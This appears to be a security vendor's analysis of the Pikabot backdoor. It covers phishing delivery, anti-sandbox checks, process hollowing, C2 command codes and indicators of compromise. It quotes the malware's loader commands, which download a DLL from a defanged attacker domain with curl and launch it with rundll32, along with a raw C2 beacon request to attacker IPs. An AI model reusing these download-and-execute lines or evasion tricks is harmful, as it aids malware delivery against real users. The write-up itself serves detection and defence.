Gridinsoft Logo

Pikabot Malware Analysis | 2024

Pikabot is a backdoor malware, used as the initial access point in high-profile cyberattacks. It is generally used to deliver other malware.

You may be interested in taking a look at our other antivirus tools:
Trojan Killer, and Online Virus Scanner.

Pikabot Backdoor Analysis by Gridinsoft

Pikabot Backdoor

March 08, 2024

Backdoors are power brokers of the malware world. Stealthy and evasive, they provide initial access and remote control over malware deployment. This one is stealthy enough to shock you. Meet Pikabot – a rising star of backdoors.

Pikabot is a modular backdoor malware, first detected in early 2023. Being a novice on a threat landscape, it quickly gained popularity over others, and became particularly famous as a substitute for the infamous QakBot. Flexibility of the final payload, along with the selection of auxiliary software, continuous development and tricky delivery methods make it a serious contender and a major security threat.

The main application for the Pikabot is the initial access provision in high-end cyberattacks. The backdoor is used to deploy exploit kits like Cobalt Strike, ransomware or other malware tools that may be used in the attack. Such sophisticated payloads obviously make up for the spreading methods and the activity scale of the malware.

Let’s dive into how Pikabot works, starting with the way it infiltrates into the system, and going to the key action – remote access and payload deployment.

Pikabot Spreading Ways

The main tactic for gaining initial access for Pikabot is spear phishing. As we mentioned above, this malware is mainly used in targeted attacks on companies, so opting for the most effective and convincing method is a must. Massive spreading is not a king there, however, it may be used in further attacks.

Email spam Pikabot
Typical example of a message that spreads Pikabot. Source: ANY.RUN

For a style of spam emails, the malware most commonly uses a routine workflow mailing topics – documents, paper work, reports and so forth. At some point, threat actors started using a technique called thread hijacking, which confuses people into thinking the email from attackers is a genuine part of the conversation. Such email messages contain an attached MS Office document, a PDF file or an archive. By launching the attachment, an unsuspecting victim was initiating the attack chain.

Analysis uncovers several approaches in deploying the actual payload, that depend on the format of the attached file. When it is an archive, the malware is often already inside, and the unsuspecting victim is lured into running a script that launches it. The said script is disguised as a document, but the file in fact has a double extension – docx.lnk, for example. It is made to run a DLL file stored in the same archive.

In case of a PDF file attached to the email message, the content of the said file usually mimics an error message that asks to download the original one from the link. One particular case used a OneDrive error message and asked to get the file “from the cloud storage”. Following the instruction initiates the downloading of the script that connects the remote server, downloads and runs the payload.

Pikabot fake PDF
Contents of a fake PDF file that Pikabot uses to trick users into downloading malware

Malvertising is the alternative approach, used much less often than email spam, probably due to the lack of targeting precision. This method bears on the faulty filtering of advertisements provided by major ad providers, like Google or Meta. By parasitizing on the names of free software, drivers and some specific tools, hackers lure the user into downloading and installing the malware on their own.

Pikabot Technical Analysis

As we mentioned in previous paragraphs, Pikabot is typically delivered by a loader script. The latter employs a rather tricky approach to deliver the malware’s DLL and execute it. Malware creates a folder in the system directory and downloads a DAT file, using a Curl command. The downloaded file is then saved as a library – this is, exactly, Pikabot.

C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll

The script likely carries a selection of backup payload sources, which it will try to execute until the malware is successfully downloaded. After that, the script performs a callout to the rundll32.exe process to launch the downloaded DLL.

"C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter

Launch, Detection and Analysis Evasion

The activity of Pikabot begins with its execution with performing the basic set of checkups. First, the malware ensures that it is not running in the debug environment using the WinAPI call NtQueryInformationProcess. If this check returns a false value, malware continues the execution by decrypting and running the rest of its DLL file. Then, another round of anti-analysis checks happens, primarily aiming at evading virtual machines and sandboxes.

Supposed code array used by Pikabot

List of DLLs Pikabot searches for during anti-analysis:

  • Cmdvrt.32.dll
  • cmdvrt.64.dll
  • Cuckoomon.dll
  • Pstorec.dll
  • avghookx.dll
  • Avghooka.dll
  • Snxhk.dll
  • api_log.dll
  • Dir_watch.dll
  • Wpespy.dll

Upon finishing this check, the malware proceeds by assembling the core from several different pieces scattered in an encrypted form across the .data section of the DLL. After decrypting these pieces using unique hardcoded RC4 keys, malware performs a process hollowing trick to the ctfmon.exe process. In fact, it may use a different one for this purpose.

It is worth noting that detection evasion tricks do not stop here. Pikabot continues to check for the signs of a debugger/sandbox after almost every networking operation, as well as some of the local activities.

Execution and Fingerprinting

Once the malware core is loaded, Pikabot starts with resolving APIs, but not in a usual manner. In order to avoid the detection, it calls for the needed API directly, using its hash, instead of the conventional resolution methods. And this tricky practice is used only for the first 3 ones needed by the malware – GetProcAddress, HeapFree and LoadLibraryA. After this step, Pikabot switches to the dynamic API resolution – a rather common practice among malware that tries to avoid EDR/XDR detection.

At this point, malware switches to gathering system information. The procedure goes through another check: if malware detects a system language set to one from the banlist, it ceases further execution. Most of samples have this list filled with languages of ex-USSR countries, which gives a hint on the malware's origin country. After passing it, Pikabot gathers a selection of system properties – most likely in order to fingerprint the system. Below is the list of data it grabs before the initial C2 connection – a rather typical set of data for a backdoor malware.

  • Username
  • Computer name
  • Display info
  • Window Dimensions
  • CPU info
  • Physical/Virtual memory
  • Domain controller name
  • OS version
  • Snapshot of its own process

C2 Communication & Malware Delivery

The data collected during the previous step is sent to the command server using HTTP POST request over HTTPS protocol. Malware tries to evade detection by performing its communications via unusual ports, ones that are typically not listened to by NDR solutions. The request in total looks like this:

POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2

In return, Pikabot would receive a command that consists of ID and supplementary data. Some of the functions duplicate each other, and some are not even functional, meaning that this part of the malware is still under development.

Function codeDescription
0x1A5AStop Pikabot execution
0x246FSpawns its copy and changes the registry to correspond this new file*
0xACBExecute a command* **
0x240, 0x359, 0x3A6Duplicate the previous one (0xACB)
0x792Inject a shellcode into a process*
0x36CInject a PE into a process*
0x985List the processes in the system**
0x2672, 0x982Empty functions

* – command comes with supplementary data

** – the result is sent back to the C2

Cyberattacks With The Use of Pikabot

Being a particularly young malware, Pikabot cannot boast of a large track record. To make matters worse, it was in the shadow of Qbot till August 2023. Only after the takedown of once the biggest botnet attackers turned their attention to Pikabot – and it already managed to make some fame.

One particular malware campaign features Black Basta ransomware deployment. Sure enough, it was not a direct action: the research uncovered the deployment of a Cobalt Strike beacon by a Pikabot botnet, led by Water Curupira threat actor. The said beacon was under control of a ransomware gang. It is worth noting that Curupira was earlier noticed spreading IceID banker and DarkGate loader, i.e. it definitely has enough connections in the cybercrime world to make use of every single merit of Pikabot.

Pikabot Indicators of Compromise

IP Addresses

15.235.202.109:2226 15.235.44.231:5938 15.235.45.155:2221
15.235.47.206:13783 15.235.47.80:23399 154.221.30.136:13724
154.61.75.156:2078 210.243.8.247:23399 210.243.8.247:23399
65.20.78.68:13721 139.180.216.25:2967 51.195.232.97:13782
51.68.147.114:2083 51.79.143.215:13783 64.176.5.228:13783
64.176.67.194:2967 158.247.253.155:2225 139.180.216.25:2967
70.34.209.101:13720 172.233.156.100:13721 154.92.19.139:2222
154.61.75.156:2078 137.220.55.190:2223 154.92.19.139:2222
188.26.127.4:13785 154.221.30.136:13724 137.220.55.190:2223
70.34.209.101:13720 154.92.19.139:2222 172.233.156.100:13721
154.61.75.156:2078 192.121.17.70:80 198.254.200.65:80

Hashes

MD5: 70e21c85d241bc5c7e1e41b6bb709ce0
MD5: fb2729cb59a5bc0420425ea693d26190
MD5: 527774acc9e68d3274e0806873b5c88d
MD5: 9a5a5b5f803d25de3e691e7dc53bb1c2
MD5: cafe2d4bd0ed1a67d84f33aca3cf4d1f
MD5: bcc53210e13294cbd6a8172558d99295
MD5: 4b1518535af6344af39bd90aa02a6c0d
MD5: 4c94707bdcf5c18307c69c9c6fe7a536

SHA256: eead7f5b6f1282ad988238cc8c39292fa99ea416f7793038a20e5caabe93112a 	
SHA256: 7e85b9d1d09301d8b3f48df44159347d89cb3c798d0436b5e9b060df4072b8c7	
SHA256: 46e0fe3a942bb1f9aa9cd1b460ca7efa9acddb3c5b2d2bc3b42a87d8463f1c66
SHA256: 2bd1ee56ffd2bbeb6f4dd80783aa476d98faa946c4284b661e5c79f25c62ef79
SHA256: e2773b171d3bd55901647d406fc3de00c7a51bfe2f250667868948fe40fadc47
SHA256: dd2b6e3aa75de8460730862f2dc739537734a7dfc9e673b6a23ee58430348ddf
SHA256: 238dcc5611ed9066b63d2d0109c9b623f54f8d7b61d5f9de59694cfc60a4e646
SHA256: a519b9d032a342985bfe1fa3f1244f1db6699805d7883139a8245eba1c2e5dab

MITRE ATT&CK

IndicatorDescription
T1566Phishing
T1204.001User Execution: Malicious Link
T1620Reflective Code Loading
T1082System Information Discovery
T1055Process Injection
T1573Encrypted Channel